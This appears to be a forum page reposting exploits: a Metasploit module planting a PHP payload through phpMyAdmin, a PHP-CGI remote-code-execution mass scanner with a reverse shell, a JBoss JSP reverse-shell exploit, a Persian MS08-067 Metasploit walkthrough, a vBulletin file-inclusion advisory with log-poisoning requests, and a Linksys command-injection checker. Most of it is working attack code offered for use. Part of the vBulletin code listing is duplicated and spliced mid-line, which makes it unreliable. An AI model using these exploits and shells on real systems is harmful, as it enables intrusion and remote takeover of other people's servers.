"#{cookies[0]}; " new_cookies << "#{cookies[1]} " new_cookies << "#{sess_id}" token = get_token_from_url(res['Location']) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('etc', 'apps', 'phpmyadmin', 'index.php'), 'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/", 'cookie' => new_cookies, 'vars_get' => { 'token' => token } }) unless res fail_with(Failure::Unknown, 'Connection timed out while attempting to login to phpMyAdmin') end if res.code == 200 and res.body.to_s =~ /phpMyAdmin is more friendly with a/ print_good('PHPMyAdmin login successful!') return new_cookies, token end end def do_sql(cookies, token, uri) fname = "#{rand_text_alpha_upper(5)}.php" sql_stmt = "SELECT \"<?php #{payload.encoded} ?>\" INTO OUTFILE \"/etc/zpanel/panel/#{fname}\"" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri('etc', 'apps', 'phpmyadmin', 'import.php'), 'cookie' => cookies, 'ctype' =>'application/x-www-form-urlencoded; charset=UTF-8', 'headers' => { 'X-Requested-With' => 'XMLHttpRequest', 'Referer' => "http://#{datastore['RHOST']}/etc/apps/phpmyadmin/server_sql.php?token=#{token}" }, 'vars_post' => { 'is_js_confirmed' => '0', 'token' => token, 'pos' => '0', 'goto' => 'server_sql.php', 'message_to_show' => 'Your+SQL+query+has+been+executed+successfully', 'prev_sql_query' => '', 'sql_query' => sql_stmt, 'sql_delimiter' => ';', 'show_query' => '1', 'ajax_request' => 'true', '_nocache' => rand.to_s[2..19].to_i } }) unless res fail_with(Failure::Unknown, 'Connection timed out when attempting to upload payload') end if res.body =~ /"success":true/ print_good("'#{fname}' successfully uploaded") print_good("A privilege escalation exploit can be found 'exploits/linux/local/zpanel_zsudo'") print_status("Executing '#{fname}' on the remote host") res = send_request_cgi({ 'method'=>'GET', 'uri'=>normalize_uri("#{uri}", "#{fname}") }) else print_error("#{res.body.to_s}") end end def exploit # Checking pChart res = send_request_cgi({ 'method'=> 'GET', 'uri'=> normalize_uri("#{datastore['URI']}", 'etc', 'lib', 'pChart2', 'examples', 'index.php') }) # if pChart is vuln version if res.body =~ /pChart 2\.x/ uname, passwd, db_name = dot_dot_slash("#{datastore['URI']}") if uname.length > 0 && passwd.length > 0 print_good('Directory traversal successful, Username/Password identified!') print_good("Username: #{uname}") print_good("Password: #{passwd}") print_good("DB Name: #{db_name}") cookies, token, sess_id = grab_sess_and_token("#{datastore['URI']}") print_status('Logging into PHPMyAdmin now') cookies, token = login_phpmyadmin("#{datastore['URI']}", uname, passwd, cookies, token, sess_id) print_status('Uploading malicious payload now') do_sql(cookies, token, "#{datastore['URI']}") else print_error('It appears that the directory traversal was unsuccessful...') end else print_error("It appears that the version of pChart is not vulnerable...") end end end
  12. Private from 0day #!/usr/bin/env python # # ap-unlock-v2.py - apache + PHP 5.x + FastCGI Remote Code Execution Vulnerability 0day (better version) # # NOTE: # - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :((( # - for connect back shell start netcat/nc and bind port on given host:port # - is ip-range scanner not is multithreaded, but iz multithreaded iz in # random scanner and is scanner from file (greets to MustLive) # - no ssl support # - more php paths can be added # - adjust this shit for windows b0xes # # 2013 # by noptrix - http://nullsecurity.net/ import sys import socket import argparse import threading import time import random import select NONE = 0 VULN = 1 SCMD = 2 XPLT = 3 t3st = 'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \ '%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \ '%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \ '%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\ '%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\ 'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n' def m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt): c0nn_b4ck = \ ''' <? set_time_limit (0); $VERSION = "1.0"; $ip = "''' + cb_h0st + '''"; $port = ''' + cb_p0rt + '''; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "unset HISTFILE; id; /bin/sh -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) {$pid = pcntl_fork(); if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) { exit(1);}$daemon = 1;} else {print "bla";}chdir("/");umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { printit("$errstr ($errno)");exit(1);}$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port");while (1) { if (feof($sock)) {printit("ERROR: Shell connection terminated");break;} if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;} $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input");fwrite($sock, $input);} if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock); fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process); function printit ($string) {if (!$daemon) {print "$string\n";}}?> ''' return c0nn_b4ck def enc0dez(): n33dz1 = ('cgi-bin', 'php') n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d', 'suhosin.simulation=on', '-d', 'disable_functions=""', '-d', 'open_basedir=none', '-d', 'auto_prepend_file=php://input', '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0', '-d', 'auto_prepend_file=php://input', '-n') fl4g = 0 arg5 = '' p4th = '' plus = '' for x in n33dz2: if fl4g == 1: plus = '+' arg5 = arg5 + plus + \ ''.join('%' + c.encode('utf-8').encode('hex') for c in x) fl4g = 1 for x in n33dz1: p4th = p4th + '/' + \ ''.join('%' + c.encode('utf-8').encode('hex') for c in x) return (p4th.upper(), arg5.upper()) def m4k3_p4yl0rd(p4yl0rd, m0de): p4th, arg5 = enc0dez() if m0de == VULN: p4yl0rd = t3st elif m0de == SCMD or m0de == XPLT: p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \ 'Host: ' + sys.argv[1] + '\r\n' \ 'Content-Type: application/x-www-form-urlencoded\r\n' \ 'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd return p4yl0rd def s3nd_sh1t(args, m0de, c0nn_b4ck): pat = '<b>Parse error</b>:' try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(float(args.t)) res = s.connect_ex((args.h, int(args.p))) if res == 0: if m0de == VULN: p4yl0rd = m4k3_p4yl0rd('', m0de) s.sendall(p4yl0rd) if pat in s.recv(4096): print "--> " + args.h + " vu1n" return args.h else: if args.v: print "--> %s n0t vu1n" % (args.h) return elif m0de == SCMD: p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', m0de) s.sendall(p4yl0rd) rd, wd, ex = select.select([s], [], [], float(args.t)) if rd: for line in s.makefile(): print line, elif m0de == XPLT: p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de) s.sendall(p4yl0rd) else: if args.v: print "--> n0 w3bs3rv3r 0n %s" % (args.h) except socket.error: return return def m4k3_r4nd_1p4ddr(num): h0sts = [] for x in range(int(num)): h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255), random.randrange(0,255), random.randrange(0,255), random.randrange(0,255))) return h0sts def sc4n_r4nd0m(args, h0st, m0de, vu1nz): args.h = h0st vu1nz.append(s3nd_sh1t(args, m0de, None)) vu1nz = filter(None, vu1nz) return def sc4n_fr0m_f1le(args, h0st, m0de, vu1nz): args.h = h0st.rstrip() vu1nz.append(s3nd_sh1t(args, m0de, None)) vu1nz = filter(None, vu1nz) return def sc4n_r4ng3(rsa, rsb, args, m0de): vu1nz = [] for i in range (rsa[0], rsb[0]): for j in range (rsa[1], rsb[1]): for k in range (rsa[2], rsb[2]): for l in range(rsa[3], rsb[3]): args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l) vu1nz.append(s3nd_sh1t(args, m0de, None)) time.sleep(0.005) vu1nz = filter(None, vu1nz) return vu1nz def m4k3_ipv4_r4ng3(iprange): a = tuple(part for part in iprange.split('.')) rsa = (range(4)) rsb = (range(4)) for i in range(0,4): ga = a[i].find('-') if ga != -1: rsa[i] = int(a[i][:ga]) rsb[i] = int(a[i][1+ga:]) + 1 else: rsa[i] = int(a[i]) rsb[i] = int(a[i]) + 1 return (rsa, rsb) def parse_args(): p = argparse.ArgumentParser( usage='\n\n ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\ '\n ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]', formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False) opts = p.add_argument_group('0pt1ons', '') opts.add_argument('-h', metavar='wh1t3h4tz.0rg', help='| t3st s1ngle h0st f0r vu1n') opts.add_argument('-p', default=80, metavar='80', help='| t4rg3t p0rt (d3fau1t: 80)') opts.add_argument('-c', metavar='\'uname -a;id\'', help='| s3nd c0mm4nds t0 h0st') opts.add_argument('-x', metavar='192.168.0.2:1337', help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll') opts.add_argument('-s', action='store_true', help='| t3st s1ngl3 h0st f0r vu1n') opts.add_argument('-r', metavar='133.1.3-7.7-37', help='| sc4nz iP addr3ss r4ng3 f0r vu1n') opts.add_argument('-R', metavar='1337', help='| sc4nz num r4nd0m h0st5 f0r vu1n') opts.add_argument('-t', default=3, metavar='3', help='| t1me0ut in s3x (d3fau1t: 3)') opts.add_argument('-f', metavar='vu1n.lst', help='| wr1t3 vu1n h0sts t0 f1l3') opts.add_argument('-i', metavar='sc4nz.lst', help='| sc4nz h0sts fr0m f1le f0r vu1n') opts.add_argument('-S', metavar='2', help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)') opts.add_argument('-T', default=2, metavar='4', help='| nuM sc4n thr3adz (d3fault: 4)') opts.add_argument('-v', action='store_true', help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng') args = p.parse_args() if not args.h and not args.r and not args.R and not args.i: p.print_help() sys.exit(0) return args def wr1te_fil3(args, vu1nz): if args.f: if vu1nz: try: f = open(args.f, "w") f.write("\n".join(vu1nz)+"\n") f.close() except: sys.stderr.write('de1n3 mudd1 k0cht guT') sys.stderr.write('\n') raise SystemExit() return def c0ntr0ller(): vu1nz = [] m0de = NONE try: args = parse_args() if not args.t: args.t = float(3) if args.h: if args.s: print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h) m0de = VULN s3nd_sh1t(args, m0de, None) elif args.c: print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h) m0de = SCMD s3nd_sh1t(args, m0de, None) elif args.x: print "[+] xpl0it1ng b0x %s " % (args.h) m0de = XPLT if args.x.find(':') != -1: if not args.x.split(':')[1]: print "[-] 3rr0r: p0rt m1ss1ng" else: cb_h0st = args.x.split(':')[0] cb_p0rt = args.x.split(':')[1] else: print "[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r" c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt) s3nd_sh1t(args, m0de, c0nn_b4ck) else: print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch" sys.exit(-1) if args.r: print "[+] sc4nn1ng r4ng3 %s " % (args.r) m0de = VULN rsa, rsb = m4k3_ipv4_r4ng3(args.r) vu1nz = sc4n_r4ng3(rsa, rsb, args, m0de) if args.R: print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R)) m0de = VULN if not args.S: args.S = float(2) h0sts = m4k3_r4nd_1p4ddr(int(args.R)) for h0st in h0sts: try: t = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st, m0de, vu1nz)) t.start() time.sleep(float(args.S)) while threading.activeCount() > int(args.T): time.sleep(2) except: sys.stdout.flush() sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n") raise SystemExit if args.i: print "[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i) m0de = VULN h0sts = tuple(open(args.i, 'r')) if not args.S: args.S = float(2) for h0st in h0sts: try: t = threading.Thread(target=sc4n_fr0m_f1le, args=(args, h0st, m0de, vu1nz)) t.start() time.sleep(float(args.S)) while threading.activeCount() > int(args.T): time.sleep(2) except KeyboardInterrupt: sys.stdout.flush() sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n") raise SystemExit #sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz) except KeyboardInterrupt: sys.stdout.flush() sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n") raise SystemExit wr1te_fil3(args, vu1nz) return def m41n(): if __name__ == "__main__": print "--==[ ap-unlock-v2.py by noptrix@nullsecurity.net ]==--" c0ntr0ller() else: print "[-] 3rr0r: y0u fuck3d up dud3" sys.exit(1) print "[+] h0p3 1t h3lp3d" # \o/ fr33 requiem 1337 h4x0rs ... m41n() # e0F
  13. #JBoss AS Remote Exploit #by Kingcope ##### use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage {print “JBoss AS Remote Exploit by Kingcope usage: perl jboss.pl “;print “example: perl daytona.pl192.168.2.10 8080 192.168.2.2 443 lnx “; exit; } if ($#ARGV != 4) { usage; } $host = $ARGV[0]; $port = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $com = $ARGV[4]; if ($com eq “lnx”) { $comspec = “/bin/sh”; } if ($com eq “win”) { $comspec = “cmd.exe”; } $|=1; $jsp=” <%@page import="java.lang.*, java.util.*, java.io.*, java.net.*" %> <%! static class StreamConnectorextends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader( new InputStreamReader( this.is ) ); out = new BufferedWriter( new OutputStreamWriter( this.os ) ); char buffer[] = new char[8192]; int length; while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 ) { out.write( buffer, 0, length ); out.flush(); } } catch( Exception e ){} try { if( in != null ) in.close(); if( out != null ) out.close(); } catch( Exception e ){} } } %> <% try { Socket socket = new Socket( "$myip", $myport ); Process process = Runtime.getRuntime().exec( "$comspec" ); ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start(); ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start(); } catch( Exception e ) {} %>“; #print $jsp;exit; srand(time()); sub randstr { my $length_of_randomstring=shift;# the length of# the random string to generate my @chars=(’’a’’..’’z’’,’’A’’..’’Z’’,’’0’’..’’9’’,’’_’’); my $random_string; foreach (1..$length_of_randomstring) {# rand @chars will generate arandom# number between 0 and scalar @chars $random_string.=$chars[rand @chars]; } return $random_string; } $appbase = randstr(8); $jspname = randstr(8); print “APPBASE=$appbase JSPNAME=$jspname “; $bsh_script = qq{import java.io.FileOutputStream;import sun.misc.BASE64Decoder;String val = “} . encode_base64($jsp, “”) . qq{“;BASE64Decoder decoder = newBASE64Decoder(); String jboss_home = System.getProperty(“jboss.server.home.dir”); new File(jboss_home + “/deploy/} . $appbase . “.war” . qq{“).mkdir(); byte[] byteval = decoder.decodeBuffer(val);String jsp_file = jboss_home + “/deploy/} . $appbase . “.war/” . $jspname . “.jsp” . qq{“;FileOutputStream fstream = newFileOutputStream(jsp_file); fstream.write(byteval); fstream.close(); }; # # UPLOAD # $params = ’’action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=’’ . uri_escape($bsh_script) . ’’&argType=java.lang.String&arg1=’’ . randstr(8) . ’’.bsh’’; my $ua = LWP::UserAgent->new; $ua->agent(“Mozilla/5.0 (Windows; U;Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98Safari/534.13?); my $req = HTTP::Request->new(POST => ” http://$host:$port/jmx-console/HtmlAdaptor “); $req->content_type(’’application/x-www-form-urlencoded’’); $req->content($params); print “UPLOAD… “; my $res = $ua->request($req); if ($res->is_success) { print “SUCCESS “; print “EXECUTE”; sleep(5); $uri = ’’/’’ . $appbase . ’’/’’ . $jspname . ’’.jsp’’; for ($k=0;$k<10;$k++) { my $ua = LWP::UserAgent->new; $ua->agent(“Mozilla/5.0 (Windows; U;Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98Safari/534.13?); my $req = HTTP::Request->new(GET => ” http://$host:$port$uri “); my $res = $ua->request($req); if ($res->is_success) { print ” SUCCESS “; exit; } else { print “.”; # print $res->status_line.” “; sleep(5); } } print “UNSUCCESSFUL “; } else { print “UNSUCCESSFUL “; print $res->status_line, ” “; exit; } Private from 0day
  14. با عرض سلام به کاربران عزیز انونیسک در این اموزش قصت دارم برایتان اموزش هک سیستم های دارای ویندوز xp و ریموت دسکتاپ شدن به ان را برای شما یاد دهم . ابتدا ترمینال کالی لینوکس را باز کنید و در داخلش دستور msfconsole را تایپ کنید تا ابزار metasploit باز شود . بعد دستور زیر را تایپ کنید . use exploit/windows/smb/ms08_067_netapi خب با این دستور اکسپلوییت مورد نظر را انتخواب میکنیم . الان سراغ تنظیم rhost یا تارگت میکنیم . خب الان دستور show options را بنویسید . خب الان بنویسید set RHOST 1.1.1.1.1 به جا 1.1.1.1.1 ایپی تارگت را وارد کنید . خب الان باز show options را بنویسید تا ببینید که ایا تارگت تنظیم شده است یا نه . خب الان یک payload را انتخواب میکنیم تا وقتی نفوذ به سیستم شد برای ما با vnc اجرا نماید خب با دستور زیر payload را انتخواب میکنیم . set PAYLOAD windows/vncinject/bind_tcp خب payload انتخواب شد الان باز show options را تایپ کنید تا ببینید RHOST تغیر نکرده اگر کرده باز set RHOST TAGERT IP تنظیم کنید بعد دستور exploit را وارد کنید و صبر کنید تا به سرور یا سیستم تارگت متصل شود . خب اگر متصل شد شما میبینید که دسکتاپ ویندوز xp به شما باز میشود . امید وارم خوشتان امده باشد
  15. # SSD Advisory – vBulletin routestring Unauthenticated Remote Code Execution Source: https://blogs.securiteam.com/index.php/archives/3569 ## Vulnerability Summary The following advisory describes a unauthenticated file inclusion vulnerability that leads to remote code execution found in vBulletin version 5. vBulletin, also known as vB, is a widespread proprietary Internet forum software package developed by vBulletin Solutions, Inc., based on PHP and MySQL database server. vBulletin powers many of the largest social sites on the web, with over 100,000 sites built on it, including Fortune 500 and Alexa Top 1M companies websites and forums. According to the latest W3Techs1 statistics, vBulletin version 4 holds more than 55% of the vBulletin market share, while version 3 and 5 divide the remaining percentage ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response We tried to contact vBulletin since November 21 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities. ## Vulnerability details vBulletin contains a vulnerability that can allow a remote attacker to include any file from the vBulletin server and execute arbitrary PHP code. An unauthenticated user is able to send a GET request to /index.php which can then trigger the file inclusion vulnerability with parameter routestring=. The request allows an attacker to create a crafted request to Vbulletin server installed on Windows OS and include any file on the web server. **Listing of /index.php:** ``` /* 48 */ $app = vB5_Frontend_Application::init('config.php'); /* 49 */ //todo, move this back so we can catch notices in the startup code. For now, we can set the value in the php.ini /* 50 */ //file to catch these situations. /* 51 */ // We report all errors here because we have to make Application Notice free /* 52 */ error_reporting(E_ALL | E_STRICT); /* 53 */ /* 54 */ $config = vB5_Config::instance(); /* 55 */ if (!$config->report_all_php_errors) { /* 56 */ // Note that E_STRICT became part of E_ALL in PHP 5.4 /* 57 */ error_reporting(E_ALL & ~(E_NOTICE | E_STRICT)); /* 58 */ } /* 59 */ /* 60 */ $routing = $app->getRouter(); /* 61 */ $method = $routing->getAction(); /* 62 */ $template = $routing->getTemplate(); /* 63 */ $class = $routing->getControllerClass(); /* 64 */ /* 65 */ if (!class_exists($class)) /* 66 */ { /* 67 */ // @todo - this needs a proper error message /* 68 */ die("Couldn't find controller file for $class"); /* 69 */ } /* 70 */ /* 71 */ vB5_Frontend_ExplainQueries::initialize(); /* 72 */ $c = new $class($template); /* 73 */ /* 74 */ call_user_func_array(array(&$c, $method), $routing->getArguments()); /* 75 */ /* 76 */ vB5_Frontend_ExplainQueries::finish(); ``` **Let’s take a closer look on vB5_Frontend_Application::init() – Listing of /includes/vb5/frontend/application.php:** ``` /* 15 */ public static function init($configFile) /* 16 */ { /* 17 */ parent::init($configFile); /* 18 */ /* 19 */ self::$instance = new vB5_Frontend_Application(); /* 20 */ self::$instance->router = new vB5_Frontend_Routing(); /* 21 */ self::$instance->router->setRoutes(); /* ... */ ``` We can see that setRoutes() is called: **Listing of /includes/vb5/frontend/routing.php:** ``` /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == /* 47 */ public function setRoutes() /* 48 */ { /* 49 */ $this->processQueryString(); /* 50 */ /* 51 */ //TODO: this is a very basic and straight forward way of parsing the URI, we need to improve it /* 52 */ //$path = isset($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : ''; /* 53 */ /* 54 */ if (isset($_GET['routestring'])) /* 55 */ { /* 56 */ $path = $_GET['routestring']; /* ... */ /* 73 */ } /* 74 */ /* 75 */ if (strlen($path) AND $path{0} == '/') /* 76 */ { /* 77 */ $path = substr($path, 1); /* 78 */ } /* 79 */ /* 80 */ //If there is an invalid image, js, or css request we wind up here. We can't process any of them /* 81 */ if (strlen($path) > 2 ) /* 82 */ { /* 83 */ $ext = strtolower(substr($path, -4)) ; /* 84 */ if (($ext == '.gif') OR ($ext == '.png') OR ($ext == '.jpg') OR ($ext == '.css') /* 85 */ OR (strtolower(substr($path, -3)) == '.js') ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 91 */ /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* 243 */ /* 244 */ vB5_ApplicationAbstract::checkState(); /* 245 */ /* 246 */ throw new vB5_Exception_404("invalid_page_url"); /* 247 */ } ) ) /* 86 */ { /* 87 */ header("HTTP/1.0 404 Not Found"); /* 88 */ die(''); /* 89 */ } /* 90 */ } /* 92 */ try /* 93 */ { /* 94 */ $message = ''; // Start with no error. /* 95 */ $route = Api_InterfaceAbstract::instance()->callApi('route', 'getRoute', array('pathInfo' => $path, 'queryString' => $_SERVER['QUERY_STRING'])); /* 96 */ } /* 97 */ catch (Exception $e) /* 98 */ { /* ... */ /* 106 */ } /* ... */ /* 127 */ if (!empty($route)) /* 128 */ { /* ... */ /* 188 */ } /* 189 */ else /* 190 */ { /* 191 */ // if no route was matched, try to parse route as /controller/method /* 192 */ $stripped_path = preg_replace('/[^a-z0-9\/-_.]+/i', '', trim(strval($path), '/')); /* ... */ /* 229 */ } /* 230 */ /* 231 */ //this could be a legacy file that we need to proxy. The relay controller will handle /* 232 */ //cases where this is not a valid file. Only handle files in the "root directory". We'll /* 233 */ //handle deeper paths via more standard routes. /* 234 */ if (strpos($path, '/') === false) /* 235 */ { /* 236 */ $this->controller = 'relay'; /* 237 */ $this->action = 'legacy'; /* 238 */ $this->template = ''; /* 239 */ $this->arguments = array($path); /* 240 */ $this->queryParameters = array(); /* 241 */ return; /* 242 */ } /* … */ ``` So if our routestring does not end with ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ and does not contain ‘/’ char vBulletin will call legacy() method from vB5_Frontend_Controller_Relay – /includes/vb5/frontend/controller/relay.php: ``` /* 63 */ public function legacy($file) /* 64 */ { /* 65 */ $api = Api_InterfaceAbstract::instance(); /* 66 */ $api->relay($file); /* 67 */ } ``` If we will check relay() from Api_Interface_Collapsed class – /include/api/interface/collapsed.php: ``` /* 117 */ public function relay($file) /* 118 */ { /* 119 */ $filePath = vB5_Config::instance()->core_path . '/' . $file; /* 120 */ /* 121 */ if ($file AND file_exists($filePath)) /* 122 */ { /* 123 */ //hack because the admincp/modcp files won't return so the remaining processing in /* 124 */ //index.php won't take place. If we better integrate the admincp into the /* 125 */ //frontend, we can (and should) remove this. /* 126 */ vB_Shutdown::instance()->add(array('vB5_Frontend_ExplainQueries', 'finish')); /* 127 */ require_once($filePath); /* 128 */ } /* ... */ ``` As we could see an attacker is not able to use ‘/’ in the $file so he cannot change current directory on Linux. But for Windows he can use ‘\’ as path delimiter and is able to specify any desired file (he can use ‘\..\’ trick as well) and it will be included by php. ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-125x300.jpg) If we want to include file with extension like ‘.gif’, ‘.png’, ‘.jpg’, ‘.css’ or ‘.js’ we will need to bypass the mentioned check in setRoutes() method. This can be easily done by adding dot (‘.’) or space (‘%20’) to the filename. ## Proof of Concept We can check if the server is vulnerable by sending the following GET request: ``` /index.php?routestring=.\\ ``` If the response is: ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-1-300x60.png) The server is vulnerable. If we want to inject a php code to any file on the server we can use the access.log for example: ``` /?LogINJ_START=<?php phpinfo();?>LogINJ_END ``` After that we can include access.log with our PHP code: ``` /index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log ``` ![](https://blogs.securiteam.com/wp-content/uploads/2017/12/vBulletin-2-300x89.jpg)
  16. Moeein Seven

    Hacking

    #!/usr/bin/python # -*- coding: utf-8 -*- # Author: Nixawk # CVE-2017-17411 # Linksys WVBR0 25 Command Injection """ $ python2.7 exploit-CVE-2017-17411.py [*] Usage: python exploit-CVE-2017-17411.py <URL> $ python2.7 exploit-CVE-2017-17411.py http://example.com/ [+] Target is exploitable by CVE-2017-17411 """ import requests def check(url): payload = '"; echo "admin' md5hash = "456b7016a916a4b178dd72b947c152b7" # echo "admin" | md5sum resp = send_http_request(url, payload) if not resp: return False lines = resp.text.splitlines() sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines) if not any([payload in sys_cmd for sys_cmd in sys_cmds]): return False if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]): return False print("[+] Target is exploitable by CVE-2017-17411 ") return True def send_http_request(url, payload): headers = { 'User-Agent': payload } response = None try: response = requests.get(url, headers=headers) except Exception as err: log.exception(err) return response if __name__ == '__main__': import sys if len(sys.argv) != 2: print("[*] Usage: python %s <URL>" % sys.argv[0]) sys.exit(0) check(sys.argv[1]) # google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US" ## References # https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair # https://thehackernews.com/2017/12/directv-wvb-hack.html
  17. Moeein Seven

    Hacking

